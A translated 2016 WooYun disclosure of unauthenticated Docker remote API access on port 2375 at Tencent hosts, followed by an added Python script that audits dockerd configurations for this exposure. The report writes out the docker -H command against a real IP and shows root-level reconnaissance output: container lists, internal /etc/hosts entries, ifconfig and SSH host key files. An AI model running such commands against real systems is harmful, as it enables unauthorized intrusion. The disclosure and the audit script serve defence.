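Vulnerability summary

Bug ID: wooyun-2016-0209760

Title: A new technique: getting root on ten Tencent machines (apparently a 20+ GB code repository)

Vendor: Tencent

Author: 黑客,绝对是黑客

Submitted: 2016-05-17 16:28

Fixed: 2016-07-02 11:50

Published: 2016-07-02 11:50

Vulnerability type: System/service operations misconfiguration

Severity: High

Self-assessed Rank: 20

Status: Confirmed by the vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]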


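Vulnerability details

Disclosure status:

2016-05-17: Details reported to the vendor; awaiting vendor handling
2016-05-18: Vendor confirmed; details disclosed to the vendor only
2016-05-28: Details disclosed to core white hats and experts in related fields
2016-06-07: Details disclosed to regular white hats
2016-06-17: Details disclosed to intern white hats
2016-07-02: Details disclosed to the public

Brief description:

Hacker, definitely a hacker!
Getting root with no effort at all.
For the record, I did not touch any data or code.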

Detailed description:

Apparently more than 20 GB of code.

[Screenshot: 6433D3CEE46A1A401670E14588E508E1.jpg]


Unauthenticated access on port 2375, 10 machines in total.


Using this one as proof: 115.159.119.88

http://115.159.119.88:2375


Listing the images:

root@ip-172-31-43-63:/home/ubuntu# docker -H tcp://115.159.119.88:2375 ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
cb4574cdb29c docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 8 minutes ago Up 8 minutes 0.0.0.0:46934->6210/tcp, 0.0.0.0:20066->14888/tcp, 0.0.0.0:46936->36000/tcp container_1458634523754_7996_02_000003_34
aba75599dbd7 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 8 minutes ago Up 8 minutes 0.0.0.0:46928->6210/tcp, 0.0.0.0:21951->14888/tcp, 0.0.0.0:46932->36000/tcp container_1458634523754_8238_02_000003_34
f738c487e6ba docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 8 minutes ago Up 8 minutes 0.0.0.0:22086->14888/tcp, 0.0.0.0:46927->36000/tcp container_1460213284004_4606_01_000003_34
2a64fe25ec69 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 8 minutes ago Up 8 minutes 0.0.0.0:46925->6210/tcp, 0.0.0.0:20561->14888/tcp, 0.0.0.0:46926->36000/tcp container_1458634523754_8066_02_000003_34
35f7b3709f79 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 8 minutes ago Up 8 minutes 0.0.0.0:46924->6210/tcp, 0.0.0.0:22091->14888/tcp, 0.0.0.0:46923->36000/tcp container_1460213284004_4608_01_000002_34
be7f9bc7a60a docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 8 minutes ago Up 8 minutes 0.0.0.0:21736->14888/tcp, 0.0.0.0:46922->36000/tcp container_1458634523754_2349_02_000002_34
b7233a0fd6e2 docker.qq.com:80/gcloud/acc_cloud:latest "/etc/rc.local bash 8 minutes ago Up 8 minutes 0.0.0.0:46919->6220/tcp, 0.0.0.0:46920->6223/tcp, 0.0.0.0:46921->36000/tcp container_1460950863294_0081_01_000005_34
1703ce2bb1ab docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 8 minutes ago Up 8 minutes 0.0.0.0:22051->14888/tcp, 0.0.0.0:46918->36000/tcp container_1460213284004_1645_01_000001_34
b0374417ecf4 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 8 minutes ago Up 8 minutes 0.0.0.0:21986->14888/tcp, 0.0.0.0:46917->36000/tcp container_1458634523754_10983_02_000001_34
5e10fe7dc8ef docker.qq.com:80/gcloud/free_zone_version_server_20160420:latest "/etc/rc.local bash 6 days ago Up 6 days 0.0.0.0:22441->14888/tcp, 0.0.0.0:46213->36000/tcp container_1460950863294_22798_01_000002_34
e1249fa8b307 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 11 days ago Up 11 days 0.0.0.0:45465->6210/tcp, 0.0.0.0:22426->14888/tcp, 0.0.0.0:45464->36000/tcp container_1460950863294_17702_01_000002_34
954fb5890386 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 13 days ago Up 13 days 0.0.0.0:45132->6210/tcp, 0.0.0.0:22381->14888/tcp, 0.0.0.0:45131->36000/tcp container_1460950863294_15653_01_000002_34
042da5523c5c docker.qq.com:80/gcloud/free_zone_version_server_20160420:latest "/etc/rc.local bash 2 weeks ago Up 2 weeks 0.0.0.0:22366->14888/tcp, 0.0.0.0:43712->36000/tcp container_1460950863294_9355_01_000002_34
7e75db06835c docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 2 weeks ago Up 2 weeks 0.0.0.0:43707->6210/tcp, 0.0.0.0:22346->14888/tcp, 0.0.0.0:43708->36000/tcp container_1460950863294_9089_01_000002_34
7b8c3d8416f5 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 3 weeks ago Up 3 weeks 0.0.0.0:42983->6210/tcp, 0.0.0.0:22306->14888/tcp, 0.0.0.0:42982->36000/tcp container_1460950863294_7315_01_000002_34
ffa5ec0c90a3 docker.qq.com:80/gcloud/free_zone_version_server_20160420:latest "/etc/rc.local bash 3 weeks ago Up 3 weeks 0.0.0.0:22281->14888/tcp, 0.0.0.0:42762->36000/tcp container_1460950863294_4170_01_000002_34
8cb83c32b459 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 3 weeks ago Up 3 weeks 0.0.0.0:22261->14888/tcp, 0.0.0.0:42599->36000/tcp container_1460950863294_3794_01_000002_34
051108731aab docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 3 weeks ago Up 3 weeks 0.0.0.0:42107->6210/tcp, 0.0.0.0:22246->14888/tcp, 0.0.0.0:42109->36000/tcp container_1460950863294_2688_01_000002_34
043e9e2fe3ce docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 3 weeks ago Up 3 weeks 0.0.0.0:22236->14888/tcp, 0.0.0.0:42104->36000/tcp container_1460950863294_2681_01_000002_34
05bdd4a7450b docker.qq.com:80/gcloud/acc_cloud:latest "/etc/rc.local bash 4 weeks ago Up 4 weeks 0.0.0.0:41027->6220/tcp, 0.0.0.0:41024->6223/tcp, 0.0.0.0:41026->36000/tcp container_1460950863294_0081_01_000002_34
9c4b20ff2175 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 4 weeks ago Up 4 weeks 0.0.0.0:41008->6210/tcp, 0.0.0.0:22221->14888/tcp, 0.0.0.0:41007->36000/tcp container_1460950863294_0021_01_000002_34
aeb0ff169be7 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 4 weeks ago Up 4 weeks 0.0.0.0:22196->14888/tcp, 0.0.0.0:41005->36000/tcp container_1460213284004_6792_01_000002_33
c5a773f8afc7 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 4 weeks ago Up 4 weeks 0.0.0.0:22191->14888/tcp, 0.0.0.0:41004->36000/tcp container_1460213284004_6791_01_000002_33
d108ad37cbb3 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 5 weeks ago Up 5 weeks 0.0.0.0:40489->6210/tcp, 0.0.0.0:20021->14888/tcp, 0.0.0.0:40488->36000/tcp container_1458634523754_14139_01_000002_32
60896378d4cf docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 5 weeks ago Up 5 weeks 0.0.0.0:21561->14888/tcp, 0.0.0.0:40486->36000/tcp container_1458634523754_13297_01_000002_32
c1b234c28429 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 5 weeks ago Up 5 weeks 0.0.0.0:22031->14888/tcp, 0.0.0.0:40291->36000/tcp container_1458634523754_12766_01_000002_32
f6254905fc6f docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 5 weeks ago Up 5 weeks 0.0.0.0:40289->6210/tcp, 0.0.0.0:20106->14888/tcp, 0.0.0.0:40288->36000/tcp container_1458634523754_11107_01_000002_32
af2ff31c86ab docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 5 weeks ago Up 5 weeks 0.0.0.0:40284->6210/tcp, 0.0.0.0:20261->14888/tcp, 0.0.0.0:40282->36000/tcp container_1458634523754_11010_01_000002_32
d35de4f633fa docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 5 weeks ago Up 5 weeks 0.0.0.0:21996->14888/tcp, 0.0.0.0:40276->36000/tcp container_1458634523754_10985_01_000002_32
0559a177d6b0 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 6 weeks ago Up 6 weeks 0.0.0.0:21616->14888/tcp, 0.0.0.0:40269->36000/tcp container_1458634523754_10451_01_000002_32
df8468c257ec docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 6 weeks ago Up 6 weeks 0.0.0.0:40267->6210/tcp, 0.0.0.0:20781->14888/tcp, 0.0.0.0:40266->36000/tcp container_1458634523754_9768_01_000002_32
3d0f2f63a1bb docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 6 weeks ago Up 6 weeks 0.0.0.0:40265->6210/tcp, 0.0.0.0:21961->14888/tcp, 0.0.0.0:40264->36000/tcp container_1458634523754_9465_01_000002_32
a9c7b78217a8 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 6 weeks ago Up 6 weeks 0.0.0.0:40261->6210/tcp, 0.0.0.0:21941->14888/tcp, 0.0.0.0:40262->36000/tcp container_1458634523754_8235_01_000002_32
4d8e7fe3b285 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 6 weeks ago Up 6 weeks 0.0.0.0:40192->6210/tcp, 0.0.0.0:20566->14888/tcp, 0.0.0.0:40191->36000/tcp container_1458634523754_8067_01_000002_32
f5950106f1a8 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 6 weeks ago Up 6 weeks 0.0.0.0:40165->6210/tcp, 0.0.0.0:20726->14888/tcp, 0.0.0.0:40164->36000/tcp container_1458634523754_8010_01_000002_32
d2d3dd6bc3d2 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 7 weeks ago Up 7 weeks 0.0.0.0:20676->14888/tcp, 0.0.0.0:40163->36000/tcp container_1458634523754_2412_01_000002_32
7f23e748dd87 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 7 weeks ago Up 7 weeks 0.0.0.0:20346->14888/tcp, 0.0.0.0:40146->36000/tcp container_1458634523754_2342_01_000002_32
17470d2efef0 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 7 weeks ago Up 7 weeks 0.0.0.0:20341->14888/tcp, 0.0.0.0:40145->36000/tcp container_1458634523754_2340_01_000002_32
1d517f7801b5 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 7 weeks ago Up 7 weeks 0.0.0.0:21776->14888/tcp, 0.0.0.0:40062->36000/tcp container_1458634523754_1005_01_000002_32
42bc26a016b6 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 7 weeks ago Up 7 weeks 0.0.0.0:20881->14888/tcp, 0.0.0.0:40061->36000/tcp container_1458634523754_1001_01_000002_32
a253660026e0 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 8 weeks ago Up 8 weeks 0.0.0.0:21511->14888/tcp, 0.0.0.0:39923->36000/tcp container_1458508352011_0322_01_000002_30
e552964949c8 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 8 weeks ago Up 8 weeks 0.0.0.0:20206->14888/tcp, 0.0.0.0:39918->36000/tcp container_1457551624703_8652_01_000002_24
f30c5597ebf2 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 8 weeks ago Up 8 weeks 0.0.0.0:21646->14888/tcp, 0.0.0.0:39914->36000/tcp container_1457551624703_8405_01_000002_24


The image repository is docker.qq.com, which shows these machines belong to Tencent.
Magic one-click root; logged in successfully.
/etc/hosts

[root@docker-10-237-142-103 home]# cat /etc/hosts
127.0.0.1 localhost VM_142_103_centos
10.105.39.219 docker-10-105-39-219
10.105.57.227 docker-10-105-57-227
10.105.48.96 docker-10-105-48-96
10.105.15.73 docker-10-105-15-73
10.105.46.15 docker-10-105-46-15
10.105.52.172 docker-10-105-52-172
10.105.111.112 docker-10-105-111-112
10.105.112.140 docker-10-105-112-140
10.237.132.103 docker-10-237-132-103
10.247.48.125 docker-10-247-48-125
10.237.142.103 docker-10-237-142-103
10.247.70.137 docker-10-247-70-137
10.131.165.90 docker.qq.com docker-10-131-165-90
10.131.164.129 registry.qq.com docker-10-131-164.129
10.105.110.204 docker-10-105-110-204
10.105.110.156 docker-10-105-110-156


ping docker.qq.com

[root@docker-10-237-142-103 home]# ping docker.qq.com
PING docker.qq.com (10.131.165.90) 56(84) bytes of data.
64 bytes from docker.qq.com (10.131.165.90): icmp_seq=1 ttl=61 time=0.334 ms
64 bytes from docker.qq.com (10.131.165.90): icmp_seq=2 ttl=61 time=0.332 ms
64 bytes from docker.qq.com (10.131.165.90): icmp_seq=3 ttl=61 time=0.303 ms
64 bytes from docker.qq.com (10.131.165.90): icmp_seq=4 ttl=61 time=0.304 ms
64 bytes from docker.qq.com (10.131.165.90): icmp_seq=5 ttl=61 time=0.371 ms


ifconfig

[root@docker-10-237-142-103 home]# ifconfig
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.1 netmask 255.255.255.0 broadcast 0.0.0.0
ether 56:84:7a:fe:97:99 txqueuelen 0 (Ethernet)
RX packets 2253025437 bytes 153768496578 (143.2 GiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2183642671 bytes 191079773682 (177.9 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.237.142.103 netmask 255.255.254.0 broadcast 10.237.143.255
ether 52:54:00:89:9b:8f txqueuelen 1000 (Ethernet)
RX packets 1701689621 bytes 183712984058 (171.0 GiB)
RX errors 0 dropped 1346 overruns 0 frame 0
TX packets 2315262507 bytes 294166431344 (273.9 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0


ssh key

[root@docker-10-237-142-103 ssh]# ls -al
total 288
drwxr-xr-x. 2 root root 4096 Feb 1 11:28 .
drwxr-xr-x. 87 root root 4096 Mar 21 17:01 ..
-rw-r--r--. 1 root root 242153 Mar 6 2015 moduli
-rw-r--r--. 1 root root 2208 Mar 6 2015 ssh_config
-rw------- 1 root root 4378 Feb 1 11:28 sshd_config
-rw-r----- 1 root ssh_keys 227 Nov 26 09:42 ssh_host_ecdsa_key
-rw-r--r-- 1 root root 162 Nov 26 09:42 ssh_host_ecdsa_key.pub
-rw-r----- 1 root ssh_keys 387 Nov 26 09:42 ssh_host_ed25519_key
-rw-r--r-- 1 root root 82 Nov 26 09:42 ssh_host_ed25519_key.pub
-rw-r----- 1 root ssh_keys 1675 Nov 26 09:42 ssh_host_rsa_key
-rw-r--r-- 1 root root 382 Nov 26 09:42 ssh_host_rsa_key.pub

Proof of vulnerability:

Fix:

See http://drops.wooyun.org/papers/15892

Copyright notice: when reposting, please credit the source: 黑客,绝对是黑客@WooYun
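
A configuration check for the exposure reported above (a Docker daemon listening on TCP port 2375 without authentication), as an added example that is not part of the original report or of Docker's own tooling. `-H`/`--host`, `--tlsverify`, `--tlscacert` and the `hosts`, `tlsverify`, `tlscacert` keys of daemon.json are real dockerd options; the function names, sample command line and certificate paths are constructed for illustration.

```python
import json
import shlex

# Constructed samples (not taken from the report): a dockerd command line that
# repeats the reported exposure, and a daemon.json requiring client certificates.
WEAK_CMD = "dockerd -H unix:///var/run/docker.sock -H tcp://0.0.0.0:2375"
HARDENED_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem", "tlskey": "/etc/docker/server-key.pem"
}"""

def parse_flags(cmdline):
    """Extract -H/--host endpoints and TLS verification flags from a dockerd command line."""
    hosts, opts = [], {}
    args = iter(shlex.split(cmdline))
    for arg in args:
        name, eq, value = arg.partition("=")
        if name in ("-H", "--host"):
            hosts.append(value if eq else next(args, ""))
        elif name == "--tlsverify":
            opts["tlsverify"] = value.lower() != "false" if eq else True
        elif name == "--tlscacert":
            opts["tlscacert"] = value if eq else next(args, "")
    return hosts, opts

def audit_dockerd(daemon_json, cmdline):
    """Return (severity, endpoint, reason) for every TCP listener lacking client-cert auth."""
    cfg = json.loads(daemon_json) if daemon_json.strip() else {}
    flag_hosts, flag_opts = parse_flags(cmdline)
    verify = flag_opts.get("tlsverify", bool(cfg.get("tlsverify", False)))
    cacert = flag_opts.get("tlscacert", cfg.get("tlscacert"))
    findings = []
    for host in list(cfg.get("hosts", [])) + flag_hosts:
        if not host.startswith("tcp://"):
            continue  # unix:// and fd:// sockets are local, guarded by file permissions
        if verify and cacert:
            continue  # clients must present a certificate signed by the configured CA
        addr = host[len("tcp://"):]
        local = addr.startswith(("127.", "localhost", "[::1]"))
        # --tls without --tlsverify encrypts traffic but still accepts any client.
        findings.append(("warn" if local else "critical", host,
                         "no client-certificate verification"))
    return findings

if __name__ == "__main__":
    for finding in audit_dockerd("", WEAK_CMD) + audit_dockerd(HARDENED_JSON, "dockerd"):
        print(*finding)
```

A loopback-only TCP listener is reported as `warn` rather than ignored, because any local process that can reach it still gets full control of the daemon.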


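Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2016-05-18 11:40

Vendor reply:

Thank you very much for your report. We have begun handling the issue, and we thank everyone for their attention to the security of Tencent's services. If you have any questions, feel free to send feedback; dedicated staff will follow up.

Latest status:

None yet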